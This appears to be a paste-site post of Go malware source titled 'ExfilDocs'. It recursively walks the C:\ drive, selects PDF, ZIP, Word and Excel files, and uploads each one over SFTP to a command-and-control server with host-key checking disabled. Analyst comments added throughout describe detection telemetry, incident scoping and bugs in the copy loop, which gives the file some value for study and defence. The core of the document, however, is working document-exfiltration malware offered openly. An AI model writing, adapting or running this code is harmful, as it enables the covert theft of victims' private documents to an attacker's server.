FlyFar

ExfilDocs (Go Malware) - Searches drive for specific file extensions + uploads files to C2 via SSH

Jul 23rd, 2023
  1. /* What do I do?
  2. I:
  3. - Search drive for specific file extensions
  4. - Upload files to C2 via SSH
  5. */
  6. package main
  7.  
  8. import (
  9.     "fmt"
  10.     "os"
  11.     "time"
  12.     "path"
  13.     "log"
  14.     "path/filepath"
  15.     "github.com/pkg/sftp"
  16.     "golang.org/x/crypto/ssh"
  17.     // "strings"
  18. )
  19.  
  // run enumerates everything under the hard-coded search root and passes each
  // collected path to CheckExtension.
  //
  // It returns the full list of visited paths; the error result is always nil,
  // because a walk error is only printed.
  //
  // Analyst notes:
  //   - The whole tree is walked first and only then filtered, so the process
  //     reads every directory under the root before any upload starts. A full
  //     recursive walk of the system drive by a non-indexing process is a
  //     file-access pattern that endpoint telemetry can surface.
  //   - The list holds directories as well as files; filtering happens later,
  //     by extension only.
  func run() ([]string, error) {
      // Raw string literal: the value is the characters C, ':', '\', '\'.
      searchDir := `C:\\`
      fileList := make([]string, 0)
      // The callback parameter named path shadows the imported "path" package
      // inside the closure. The err argument is never inspected and the callback
      // always returns nil.
      e := filepath.Walk(searchDir, func(path string, f os.FileInfo, err error) error {
          fileList = append(fileList, path)
          return nil
      })

      if e != nil {
          // Walk failure is written to stdout and otherwise ignored.
          fmt.Println(e)
          // panic(e)
      }

      // Second pass: every collected path goes through the extension filter,
      // which triggers the upload for matches.
      for _, file := range fileList {
          CheckExtension(file)

      }

      return fileList, nil
  }
  40.  
  // CheckExtension is the targeting filter: it uploads file when its extension
  // is one of .pdf, .zip, .doc, .docx, .xls or .xlsx.
  //
  // The comparison is an exact string match on the value returned by
  // filepath.Ext, so it is case-sensitive. For incident scoping, the set of
  // files that could have been sent is therefore the lower-case-extension
  // documents and archives under the search root.
  func CheckExtension(file string){
      extension := filepath.Ext(file)
      if (extension == ".pdf") || (extension == ".zip") ||  (extension == ".doc") || (extension == ".docx") || (extension == ".xls") || (extension == ".xlsx") {
          // The matched path is printed to stdout before the upload is attempted.
          fmt.Println(file)
          // One uploadfile call per match; uploadfile opens its own connection.
          uploadfile(file)
          //file upload
      }
  }
  49.  
  50.  
  // main is the entry point: it calls run once and discards both of its return
  // values. No persistence, argument parsing or other setup is visible here.
  func main() {
      run()
  }
  54.  
  // connect opens an SSH session to host:port with password authentication and
  // returns an SFTP client layered on top of it.
  //
  // Parameters: user and password are the SSH credentials; host and port form
  // the dial address. Returns the SFTP client, or nil and the error from
  // ssh.Dial or sftp.NewClient.
  //
  // Analyst notes:
  //   - HostKeyCallback is ssh.InsecureIgnoreHostKey(), so the server's host key
  //     is not verified; the client accepts whatever endpoint answers.
  //   - Authentication is password-only, which means the credentials are passed
  //     in by the caller as plain strings.
  //   - If sftp.NewClient fails, the already-established sshClient is not closed
  //     in this function.
  func connect(user, password, host string, port int) (*sftp.Client, error) {
   var (
   auth   []ssh.AuthMethod
   addr   string
   clientConfig *ssh.ClientConfig
   sshClient *ssh.Client
   sftpClient *sftp.Client
   err   error
   )
   // get auth method
   auth = make([]ssh.AuthMethod, 0)
   auth = append(auth, ssh.Password(password))

   clientConfig = &ssh.ClientConfig{
   User: user,
   // No host key verification (see the notes above).
   HostKeyCallback: ssh.InsecureIgnoreHostKey(),
   Auth: auth,
   // Upper bound on establishing the TCP connection.
   Timeout: 30 * time.Second,
   }

   addr = fmt.Sprintf("%s:%d", host, port)

   if sshClient, err = ssh.Dial("tcp", addr, clientConfig); err != nil {
   return nil, err
   }
   if sftpClient, err = sftp.NewClient(sshClient); err != nil {
   return nil, err
   }

   return sftpClient, nil
  }
  86.  
  // uploadfile copies one local file to the remote server over SFTP, opening a
  // fresh connection for each call.
  //
  // The endpoint and credentials are the literals "username", "password",
  // "server" and port 22, which look like placeholders; the remote directory is
  // "/tmp/". Every error is logged and execution continues; nothing is returned
  // to the caller.
  //
  // Analyst notes:
  //   - One SSH session per matched file: on the network this appears as many
  //     short outbound TCP/22 connections from the same host to one
  //     destination, each followed by an SFTP file create.
  //   - The completion message and the imported sftp/ssh package paths are
  //     static strings that can serve as string-match candidates when triaging
  //     a compiled sample.
  //   - A failed connect, open or create is only logged, so the later calls run
  //     on whatever values were returned — presumably nil; expect a crash
  //     rather than a clean exit in that case (confirm on a sample).
  func uploadfile(file string){
   var (
   err  error
   sftpClient *sftp.Client
   )


   sftpClient, err = connect("username", "password", "server", 22)
   if err != nil {
   log.Println(err)
   }
   defer sftpClient.Close()
   var localFilePath = file
   var remoteDir = "/tmp/"
   srcFile, err := os.Open(localFilePath)
   if err != nil {
   log.Println(err)
   }
   defer srcFile.Close()

   // NOTE(review): the "path" package treats only '/' as a separator. For
   // backslash-separated Windows paths the remote file name is presumably the
   // entire local path string; verify against files recovered from the server.
   var remoteFileName = path.Base(localFilePath)
   dstFile, err := sftpClient.Create(path.Join(remoteDir, remoteFileName))
   if err != nil {
   log.Println(err)
   }
   defer dstFile.Close()

   // Copy loop: fixed 1024-byte buffer, read error discarded, loop ends on a
   // zero-length read. Each iteration writes the whole buffer regardless of n,
   // so the remote copy's size is a multiple of 1024 and its hash will not
   // match the original unless the source length already is one.
   buf := make([]byte, 1024)
   for {
   n, _ := srcFile.Read(buf)
   if n == 0 {
    break
   }
   dstFile.Write(buf)
   }

   // Printed whenever this point is reached; write errors are never checked.
   fmt.Println("copy file to remote server finished!")
  }
Tags: malware ssh go c2